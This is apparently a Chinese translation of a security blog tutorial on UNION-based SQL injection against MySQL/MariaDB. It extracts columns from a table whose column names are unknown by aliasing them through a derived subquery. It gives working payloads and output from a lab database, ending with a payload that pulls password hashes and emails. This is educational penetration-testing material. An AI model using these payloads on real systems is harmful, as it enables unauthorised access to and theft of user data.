如何在不知道MySQL列名的情况下注入出数据?

iso60001  2137天前

22.jpg

介绍

你可能会遇到这样的情况:SQL注入时,需要从MySQL的某个表中导出某些数据。一般来说,要想导出数据,你必须知道表名、列名,而这两个名字在某些情况下可能你并不知道。

例如,对于版本小于5.0的MySQL数据库,以及部分有WAF干扰的版本大于5.0的MySQL数据库,你就无法轻易获得表名、列名。

在这种情况下,也许你会放弃,仅仅注入出数据库名字,证明漏洞存在就结束。

但在这篇文章中,我将展示一种在不知道列名情况下进行的注入。

无列名注入

我和我的队友@aboul3la一起,创建了一个数据库环境来模拟被攻击的目标,并通过大量的尝试最终找到了一个可行方法。

首先展示一下目标表users

MariaDB [dummydb]> select * from users;
+----+--------------+------------------------------------------+-----------------------------+------------+---------------------+
| id | name         | password                                 | email                       | birthdate  | added               |
+----+--------------+------------------------------------------+-----------------------------+------------+---------------------+
|  1 | alias        | a45d4e080fc185dfa223aea3d0c371b6cc180a37 | veronica80@example.org      | 1981-05-03 | 1993-03-20 14:03:14 |
|  2 | accusamus    | 114fec39a7c9567e8250409d467fed64389a7bee | sawayn.amelie@example.com   | 1979-10-28 | 2007-01-20 18:38:29 |
|  3 | dolor        | 7f796c9e61c32a5ec3c85fed794c00eee2381d73 | stefan41@example.com        | 2005-11-16 | 1992-02-16 04:19:05 |
|  4 | et           | aaaf2b311a1cd97485be716a896f9c09aff55b96 | zwalsh@example.com          | 2015-07-22 | 2014-03-05 22:57:18 |
|  5 | voluptatibus | da16b4d9661c56bb448899d7b6d30060da014446 | pattie.medhurst@example.net | 1991-11-22 | 2005-12-04 20:38:41 |
+----+--------------+------------------------------------------+-----------------------------+------------+---------------------+
5 rows in set (0.00 sec)

我们可以看到,这次表的列名有“name”、“password”、“email”、“出birthday”和“added”。

下一步,我们输入一个注入中经常使用的探明列数的查询句式

MariaDB [dummydb]> select 1,2,3,4,5,6 union select * from users;
+---+--------------+------------------------------------------+-----------------------------+------------+---------------------+
| 1 | 2            | 3                                        | 4                           | 5          | 6                   |
+---+--------------+------------------------------------------+-----------------------------+------------+---------------------+
| 1 | 2            | 3                                        | 4                           | 5          | 6                   |
| 1 | alias        | a45d4e080fc185dfa223aea3d0c371b6cc180a37 | veronica80@example.org      | 1981-05-03 | 1993-03-20 14:03:14 |
| 2 | accusamus    | 114fec39a7c9567e8250409d467fed64389a7bee | sawayn.amelie@example.com   | 1979-10-28 | 2007-01-20 18:38:29 |
| 3 | dolor        | 7f796c9e61c32a5ec3c85fed794c00eee2381d73 | stefan41@example.com        | 2005-11-16 | 1992-02-16 04:19:05 |
| 4 | et           | aaaf2b311a1cd97485be716a896f9c09aff55b96 | zwalsh@example.com          | 2015-07-22 | 2014-03-05 22:57:18 |
| 5 | voluptatibus | da16b4d9661c56bb448899d7b6d30060da014446 | pattie.medhurst@example.net | 1991-11-22 | 2005-12-04 20:38:41 |
+---+--------------+------------------------------------------+-----------------------------+------------+---------------------+
6 rows in set (0.00 sec)

很好,我们可以注意到,查询结果中的列的名称从name、password、email、birthdate替换为1、2、3、4、5、6,这主要是因为前面的查询语句select 1,2,3,4,5,6

下一步我们就可以根据查询结果中的新的列名提取数据,而针对的数据表就是以上的查询结果。

使用查询语句select4from (select 1,2,3,4,5,6 union select * from users)redforce;你就可以将选出第4列数据,也就是电子邮件地址,

MariaDB [dummydb]> select `4` from (select 1,2,3,4,5,6 union select * from users)redforce;
+-----------------------------+
| 4                           |
+-----------------------------+
| 4                           |
| veronica80@example.org      |
| sawayn.amelie@example.com   |
| stefan41@example.com        |
| zwalsh@example.com          |
| pattie.medhurst@example.net |
+-----------------------------+
6 rows in set (0.00 sec)

然后依次select 3,select 2等等。

33.png

如果要将其带入实际的注入环境中,我们可以融合产生如下payload-1 union select 1,(select`4`from (select 1,2,3,4,5,6 union select * from users)a limit 1,1)-- -。你可以通过不停的修改列名1,2,3,4来提取数据。

MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select `2` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
+-----------+-------+
| author_id | title |
+-----------+-------+
|         1 | alias |
+-----------+-------+
1 row in set (0.00 sec)
MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select `3` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
+-----------+------------------------------------------+
| author_id | title                                    |
+-----------+------------------------------------------+
|         1 | a45d4e080fc185dfa223aea3d0c371b6cc180a37 |
+-----------+------------------------------------------+
1 row in set (0.00 sec)
MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select `4` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
+-----------+------------------------+
| author_id | title                  |
+-----------+------------------------+
|         1 | veronica80@example.org |
+-----------+------------------------+
1 row in set (0.00 sec)

44.png

总而言之

通过这种将未知原列名转换为其他值的方法,你就可以注入出所有的数据。

最终payload

MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union select 1,(select concat(`3`,0x3a,`4`) from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);
+-----------+-----------------------------------------------------------------+
| author_id | title                                                           |
+-----------+-----------------------------------------------------------------+
|         1 | a45d4e080fc185dfa223aea3d0c371b6cc180a37:veronica80@example.org |
+-----------+-----------------------------------------------------------------+

谢谢阅读这篇文章!

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场
来源:https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/

最新评论

昵称
邮箱
提交评论